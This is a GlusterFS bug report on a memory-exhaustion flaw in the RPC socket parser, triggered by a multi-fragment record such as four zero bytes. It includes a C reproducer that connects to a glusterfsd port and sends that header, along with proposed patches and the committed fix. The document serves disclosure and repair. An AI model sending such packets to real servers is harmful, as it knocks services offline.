Bug 1139598 - Memory is exhausted quickly when handling a message with multiple fragments in a single record
Summary: Memory is exhausted quickly when handling a message with multiple fragments in a single record
Keywords:
Status: CLOSED CURRENTRELEASE
Alias: None
Product: GlusterFS
Classification: Community
Component: rpc
Version: mainline
Hardware: All
OS: Linux
Priority: unspecified
Severity: low
Target Milestone: ---
Assignee: Gu Feng
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks: 1136221 1146200 1146466 1146470 1152900
 
Reported: 2014-09-09 09:50 UTC by Gu Feng
Modified: 2015-05-14 17:43 UTC
CC List: 4 users

Fixed In Version: glusterfs-3.7.0
Doc Type: Bug Fix
Doc Text:
Clone Of: 1136221
Clones: 1146470
Environment:
Last Closed: 2015-05-14 17:27:34 UTC
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Embargoed:


Attachments

Description Gu Feng 2014-09-09 09:50:54 UTC
+++ This bug was initially created as a clone of Bug #1136221 +++

Description of problem:
    We construct some RPC messages and send them to the IP and port on which a glusterfsd process listens; the memory usage of that process grows quickly until memory is exhausted.

Version-Release number of selected component (if applicable):
    3.3.0, 3.4.1, 3.5.0


Steps to Reproduce:
1. Start the glusterfs services and note the IP and port on which one glusterfsd process listens

2. Run the attached Python script, which connects to that IP and port and sends the four bytes 00 00 00 00 to the glusterfsd process (a sketch of an equivalent reproducer follows these steps)

3. Watch the memory usage of the glusterfsd process. It grows quickly
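
The attached Python reproducer is not included in this report; the following is a hypothetical C sketch of an equivalent reproducer, assuming the described behaviour (connect and send an all-zero 4-byte RPC fragment header). HOST and PORT are placeholders for the address the glusterfsd process listens on.

/*
 * Hypothetical reproducer sketch (the actual attachment is a Python
 * script and is not shown here).  It connects to a glusterfsd port and
 * writes a single 4-byte RPC fragment header of all zeroes, i.e.
 * "not the last fragment, fragment length 0".
 */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main (void)
{
        const char *host = "127.0.0.1";   /* placeholder */
        int         port = 49152;         /* placeholder: glusterfsd brick port */
        char        fraghdr[4] = {0, 0, 0, 0};

        int sock = socket (AF_INET, SOCK_STREAM, 0);
        if (sock < 0) { perror ("socket"); return 1; }

        struct sockaddr_in addr;
        memset (&addr, 0, sizeof (addr));
        addr.sin_family = AF_INET;
        addr.sin_port   = htons (port);
        inet_pton (AF_INET, host, &addr.sin_addr);

        if (connect (sock, (struct sockaddr *) &addr, sizeof (addr)) < 0) {
                perror ("connect");
                return 1;
        }

        /* Send the all-zero fragment header, then keep the connection
         * open while watching the glusterfsd memory usage. */
        write (sock, fraghdr, sizeof (fraghdr));
        pause ();

        close (sock);
        return 0;
}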

Actual results:
   Memory usage of the glusterfsd process grows quickly until memory is exhausted

Expected results:
   Glusterfsd should simply ignore such messages


Additional info:
   The bug appears to be in __socket_proto_state_machine(), which goes into an infinite loop allocating memory when it handles this special message. The special message is one with multiple fragments in a single record, and some values are not reset when the next fragment is handled.
  
   We tested the fix below and it seems to work:
          if (!RPC_LASTFRAG (in->fraghdr)) {

+                 in->pending_vector = in->vector;
+                 in->pending_vector->iov_base = &in->fraghdr;
+                 in->pending_vector->iov_len  = sizeof (in->fraghdr);
                  in->record_state = SP_STATE_READING_FRAGHDR;
                  break;
          }
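
For context, here is a minimal standalone sketch of the ONC RPC record-marking format (RFC 5531) that this state machine parses. This is illustrative code, not GlusterFS code: each fragment begins with a 4-byte header whose most significant bit is the "last fragment" flag and whose remaining 31 bits give the fragment length, which is what the RPC_LASTFRAG check above tests. A header of 00 00 00 00 therefore means "not the last fragment, length 0", so the parser must loop back and read another fragment header, which is exactly the path where pending_vector was not being reset.

#include <stdint.h>
#include <stdio.h>
#include <arpa/inet.h>   /* ntohl */

#define RM_LASTFRAG  0x80000000U   /* last-fragment flag */
#define RM_FRAGSIZE  0x7fffffffU   /* fragment length mask */

int main (void)
{
        uint32_t fraghdr_wire = 0x00000000;  /* the four zero bytes sent by the reproducer */
        uint32_t fraghdr      = ntohl (fraghdr_wire);

        int      last = (fraghdr & RM_LASTFRAG) != 0;
        uint32_t size = fraghdr & RM_FRAGSIZE;

        printf ("last fragment: %s, fragment size: %u\n",
                last ? "yes" : "no", size);
        /* prints: last fragment: no, fragment size: 0 */
        return 0;
}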

--- Additional comment from jiangkai on 2014-09-04 06:35:44 EDT ---

There are more issues than expected in handling the "multi fragments in a single record" message. The proposal is to reject such records:


 if (!RPC_LASTFRAG (in->fraghdr)) {
       gf_log (this->name, GF_LOG_ERROR, "multiple fragments per record not supported now");
       ret = -1;
       goto out;
 }

--- Additional comment from jiangkai on 2014-09-05 04:45:08 EDT ---

This happens in releases after 3.4; 3.3.1 reports error messages instead.

It seems to have been introduced by change Icd9f256bb2fd8c6266a7abefdff16936b4f8922d, which added SSL support.

--- Additional comment from Anand Avati on 2014-09-09 04:30:12 EDT ---

REVIEW: http://review.gluster.org/8662 (socket: Fixed parsing RPC records containing multi fragments) posted (#1) for review on master by Gu Feng (flygoast)

Comment 1 Anand Avati 2014-09-09 10:03:17 UTC
REVIEW: http://review.gluster.org/8662 (socket: Fixed parsing RPC records containing multi fragments) posted (#2) for review on master by Gu Feng (flygoast)

Comment 2 Anand Avati 2014-09-13 16:27:24 UTC
REVIEW: http://review.gluster.org/8662 (socket: Fixed parsing RPC records containing multi fragments) posted (#3) for review on master by Gu Feng (flygoast)

Comment 3 Anand Avati 2014-09-19 12:37:09 UTC
COMMIT: http://review.gluster.org/8662 committed in master by Raghavendra G (rgowdapp) 
------
commit fb6702b7f8ba19333b7ba4af543d908e3f5e1923
Author: Gu Feng <flygoast>
Date:   Tue Sep 9 18:00:22 2014 +0800

    socket: Fixed parsing RPC records containing multi fragments
    
    In __socket_proto_state_machine(), when parsing RPC records containing
    multiple fragments, only the parsing state was changed; the memory needed
    to coalesce the multiple fragments was not handled.
    
    Change-Id: I5583e578603bd7290814a5d26885b31759c73115
    BUG: 1139598
    Signed-off-by: Gu Feng <flygoast>
    Reviewed-on: http://review.gluster.org/8662
    Tested-by: Gluster Build System <jenkins.com>
    Reviewed-by: Niels de Vos <ndevos>
    Reviewed-by: Raghavendra G <rgowdapp>
    Tested-by: Raghavendra G <rgowdapp>
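
For illustration only, a schematic of the coalescing approach the commit message describes; this is not the actual patch (see http://review.gluster.org/8662 for the real change), and the struct and function names below are hypothetical. Each fragment's payload is appended to a single record buffer, and the record is considered complete only once a header with the last-fragment bit set has been consumed.

#include <stdint.h>
#include <stdlib.h>
#include <string.h>

struct record {
        char   *buf;   /* coalesced record data */
        size_t  len;   /* bytes accumulated so far */
};

/* Append one fragment's payload to the record buffer.
 * Returns 1 when the record is complete (last fragment seen),
 * 0 when more fragments are expected, -1 on allocation failure. */
static int record_append_fragment (struct record *rec, uint32_t fraghdr,
                                   const char *payload)
{
        uint32_t fragsize = fraghdr & 0x7fffffffU;

        char *tmp = realloc (rec->buf, rec->len + fragsize);
        if (!tmp && fragsize)
                return -1;
        rec->buf = tmp;

        memcpy (rec->buf + rec->len, payload, fragsize);
        rec->len += fragsize;

        return (fraghdr & 0x80000000U) ? 1 : 0;
}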

Comment 4 Niels de Vos 2015-05-14 17:27:34 UTC
This bug is being closed because a release has been made available that should address the reported issue. In case the problem is still not fixed with glusterfs-3.7.0, please open a new bug report.

glusterfs-3.7.0 has been announced on the Gluster mailing lists [1]; packages for several distributions should become available in the near future. Keep an eye on the Gluster Users mailing list [2] and the update infrastructure for your distribution.

[1] http://thread.gmane.org/gmane.comp.file-systems.gluster.devel/10939
[2] http://thread.gmane.org/gmane.comp.file-systems.gluster.user


